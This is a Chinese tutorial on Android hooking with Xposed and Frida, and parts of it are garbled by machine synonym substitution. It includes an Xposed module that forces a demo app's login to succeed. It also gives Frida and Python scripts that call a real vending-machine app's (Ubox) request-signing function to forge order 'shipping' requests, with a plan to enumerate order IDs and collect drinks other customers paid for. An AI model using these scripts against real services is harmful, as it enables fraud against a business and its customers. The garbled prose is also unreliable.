是个开源的框架,在github上有源码的,直接下载apk后安装激活就可以利用,很多地方有这方面的教程,针对不同的手机架构,有大牛做了针对性的修正。可以在论坛中进行搜索
通过更换/system/bin/app_process程序掌握zygote进程,使得app_process在启动过程中会加载XposedBridge.jar这个jar包,从而完成对Zygote进程及其创建的Dalvik虚拟机的挟制。
Xposed在开机的时候完成对所有的Hook Function的挟制,在原Function实行的前后加上自定义代码
很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架供应了很大的便利,xposed紧张是对方法的hook,在以往的重打包技能中,须要对smali代码的进行修正,修正起来比较麻烦。
利用xposed框架可以很随意马虎的获取到android运用中的信息,比如加密私钥、salt值等等,不须要饭编译获取密钥转换算法、不须要理解密钥保存机制,直接hook函数,获取输入输出就可以。
事理在Android系统中,运用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的运用程序进程时,都会将这个Dalvik虚拟机实例复制到新的运用程序进程里面去,从而使得每一个运用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择更换app_process的缘故原由。Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。把稳,一个运用程序进程被Zygote进程孵化出来的时候,不仅会得到Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也便是可以将XposedBridge这个jar包加载到每一个Android运用程序中的缘故原由。XposedBridge有一个私有的Native(JNI)方法hookMethodNative,这个方法也在app_process中利用。这个函数供应一个方法工具利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行剖析,不得不说,作者对付android的机制和java的理解已经相称深入了。
大略实例很大略的一个android登入代码:
public class MainActivity extends AppCompatActivity { private TextView accountView; private TextView passwdView; private Button loginBut; private Button quitBut; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); accountView = (TextView) findViewById(R.id.account); passwdView = (TextView) findViewById(R.id.pwd); loginBut = (Button) findViewById(R.id.login); quitBut = (Button) findViewById(R.id.quit); loginBut.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { String username = accountView.getText() + ""; String password = passwdView.getText() + ""; if(isCorrectInfo(username,password)){ Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show(); } else{ Toast.makeText(MainActivity.this,"登入失落败",Toast.LENGTH_LONG).show(); } } }); } public boolean isCorrectInfo(String username, String password) { if(username.equals("admin") && password.equals("passwd")){ return true; } else{ return false; } }}
很大略的便是判断下用户输入的用户名和密码是精确,这里做个大略的演示,将用户输入的用户名和密码信息hook出来不管精确与否
大略说下xposed模块的开拓,首先须要的是导入api,详细的可以参考:http://github.com/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API
在manifest中定义
<application android:label="xposed"> <meta-data android:name="xposedmodule" android:value="true" /> <meta-data android:name="xposeddescription" android:value="hook test" /> <meta-data android:name="xposedminversion" android:value="82" /> </application>
声明这个是xposed模块,名称为hook test 并且利用api版本号是82
下面创建运行时候的hook代码:
package com.example.xposed;import java.util.List;import de.robv.android.xposed.IXposedHookLoadPackage;import de.robv.android.xposed.XC_MethodHook;import de.robv.android.xposed.XposedBridge;import de.robv.android.xposed.callbacks.XC_LoadPackage;import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;public class Main implements IXposedHookLoadPackage { // 包加载的时候回调 public void handleLoadPackage(final XC_LoadPackage.LoadPackageParam lpparam) throws Throwable { //过滤掉不是com.example.logintest的运用 if (!lpparam.packageName.equals("com.example.logintest")) return; XposedBridge.log("加载运用:" + lpparam.packageName); // Hook MainActivity 中的判断方法 findAndHookMethod("com.example.logintest.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,String.class new XC_MethodHook() { @Override protected void beforeHookedMethod(MethodHookParam param) throws Throwable { super.beforeHookedMethod(param); // XposedBridge.log("开始挟制~~~~"); // XposedBridge.log("参数1:" + param.args[0]); XposedBridge.log("参数2:" + param.args[1]); XposedBridge.log("修正登入数据~~~~");// 修正为精确的用户名密码 param.args[0]="admin"; param.args[1]="passwd"; } @Override protected void afterHookedMethod(MethodHookParam param) throws Throwable {// super.afterHookedMethod(param); XposedBridge.log("挟制结束~~~~");// XposedBridge.log("参数1:" + param.args[0]);// XposedBridge.log("参数2:" + param.args[1]); } }); }}
看代码中的注释,紧张是三个方法的调用,handleLoadPackage,紧张是获取到android包的干系信息,这里由于只是对logintest进行hook,做下大略的判断。
findAndHookMethod 是紧张的hook入口,里面几个参数分别为包名,classloader,hook的函数名,参数类型(这个比较随意马虎出错,比如list类型写为List.class),回调函数
回调函数中比较主要的:beforeHookedMethod和afterHookedMethod,一个是在函数运行前挟制掉,一个是hook后放行,实例中对用户输入的字段进行挟制打印,后面将参数之改为精确登入用户名和密码,这样在app中输入任何字符都能登入成功
frida Hook框架Frida是一款基于python + javascript 的hook框架,通杀android\ios\linux\win\osx等各平台,由于是基于脚本的交互,因此比较xposed和substrace cydia更加便捷,本文重点先容Frida在android下面的利用。
Frida的官网为:https://frida.re/
安装Frida非常大略,在pc端直接实行
pip install frida
即可
在Android设备须要导入frida的做事端,须要root你的手机
$ curl -O http://build.frida.re/frida/android/arm/bin/frida-server$ chmod+x frida-server$ adb push frida-server /data/local/tmp/运行
设备上运行frida-server:
$ adb shellroot@android:/ chmod 700 frida-server$ adb shellroot@android:/ /data/local/tmp/frida-server -t 0 (把稳在root下运行)
电脑上运行adb forward tcp转发:
adb forward tcp:27042 tcp:27042adb forward tcp:27043 tcp:27043
27042端口用于与frida-server通信,之后的每个端口对应每个注入的进程.
运行如下命令验证是否成功安装:
$ frida-ps-R
正常情形该当输出进程列表如下:
PID NAME 1590 com.facebook.katana13194 com.facebook.katana:providers12326 com.facebook.orca13282 com.twitter.android…Hook模块的编写
hook的紧张模块是js编写的,利用javascript的api与server进行通信
下面结合一个真实例子进行大略的先容:
这里我们剖析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会相应要求,自己掉货出来
下面对友宝的订单进行剖析过程
抓取订单链接:
http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588
sign是校验值,紧张是防止订单假造的,orderid是产生的支付订单id,这个紧张是防止假造用
反编译友宝app找到morder/shipping所在的包为:com/ub/main/d/e.class
个中localStringBuffer存储的便是url中的参数信息,该要求查找到的代码在a()
天生署名的函数在com/ub/main/d/e.class中的b函数
末了加上sign值,发送要求
可以反编译出他的sign打算方法,也可以直接调用b函数来产生sign值,后来创造app会自动取韶光戳,我们就不须要给他array型的参数
直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了的js代码
var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();var context = currentApplication.getApplicationContext();var signclass = Dalvik.use("com.ub.main.d.e");# 调用com.ub.main.d.e类var signInstance=signclass.$new(context); # 反射创建一个新的工具var sign=signInstance.a("255601452"); #调用工具的a函数send(sign); #将调用函数的结果发送出来对付订单的连接进行下测试,看涌现的sign值是否同等,可以将js和python脚本组合到一起:
# -- coding:utf-8 --import frida, sys #引入frida类import logginglogging.basicConfig(filename='test.log', level=logging.INFO)reload(sys)sys.setdefaultencoding('utf-8') #对输出进行utf8的编码print sys.getdefaultencoding()def print_result(message): #对输出的信息进行打印 print message logging.info(message)def on_message(message, data): # 反调函数,用来接管message的信息,message后面会说到 try: print_result(message=message) except: passdid = "255601452" # 订单idtime = "1472706588" # 韶光戳jscode = """ # 核心代码,这段紧张是调用app中的相应处理函数,后面会剖析这段代码的来源Dalvik.perform(function () { # 解释是Dalvik平台 var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication(); var context = currentApplication.getApplicationContext(); var signclass = Dalvik.use("com.ub.main.d.e");# 调用com.ub.main.d.e类 var signInstance=signclass.$new(context); # 反射创建一个新的工具 var sign=signInstance.a("255601452"); #调用工具的a函数 send(sign); #将调用函数的结果发送出来});"""#print jscodeprocess = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # 获取连接的设备并列举取末了一个设备连接,并附到com.ub.main的进程上面print processscript = process.create_script(jscode) # 调用相应的js函数,获取函数调用后的结果值script.on('message', on_message) # 利用回调,将message通报给on_message函数print "done"script.load()对付上面的代码,调用app中的某个函数,比如sign值天生函数,加密解密函数,不须要自己单独地去剖析算法流程,剖析key值在哪,直接调用app的相应函数,让app帮我们完成这些事情
自动化的批量处理这里是不是可以遍历所有的订单号,然后调用上面的署名批量遍历结果去要求。只要别人买了饮料没有取的话,遍历到他的订单就可以要求做事器说我来取饮料了,这样触发吐货要求?
看代码
# __author__ = 'adrain'# -- coding:utf-8 --import frida, sysimport loggingimport requestslogging.basicConfig(filename='test.log', level=logging.INFO)reload(sys)sys.setdefaultencoding('utf-8')# print sys.getdefaultencoding()class ubox: def __init__(self): pass def request(self, payload): # print "requests" dict = {} url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4" for i in payload.split("&"): key = i.split("=")[0] value = i.split("=")[1] dict[key] = value data=dict r=requests.post(url=url,data=data) print r.text def print_result(self, message): # print message payload = message["payload"] print payload self.request(payload) def on_message(self, message, data): self.print_result(message=message) def fuzzing(self, did): jscode = """ Dalvik.perform(function () { var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication(); var context = currentApplication.getApplicationContext(); var signclass = Dalvik.use("com.ub.main.d.e"); var signInstance=signclass.$new(context); var sign=signInstance.a("%s"); send(sign); }); """ % did # print jscode process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # print process script = process.create_script(jscode) script.on('message', self.on_message) # print "done" script.load() # sys.stdin.read()ub = ubox()ub.fuzzing("255912964")布局了一个类,后面直接fuzz uid就可以了,提取里面的sign值拼接到post数据中去
可以产生的post要乞降抓到的数据包的要求是完备一样的,但是并没有测试成功,剖析缘故原由有可能是订单id和用户的id有所绑定。
不过学习到了若何通过frida对app进行剖析。
繁芜参数的hook如果碰着函数的参数类型是数组、map、ArrayList类型的,首先目标MyClass类的fun1函数,声明如下:
public static boolean fun1(String[][] strAry, Map mp1, Map<String,String> mp2, Map<Integer, String> mp3, ArrayList<String> al1, ArrayList<Integer> al2, ArgClass ac)办理方法:
用Xposed自身供应的XposedHelpers的findClass方法加载每一个类,然后再将得到的类通报给hook函数作参数!
参考链接:
http://bbs.pediy.com/showthread.php%3Ft%3D202147%26page%3D2
http://www.freebuf.com/articles/terminal/56453.html
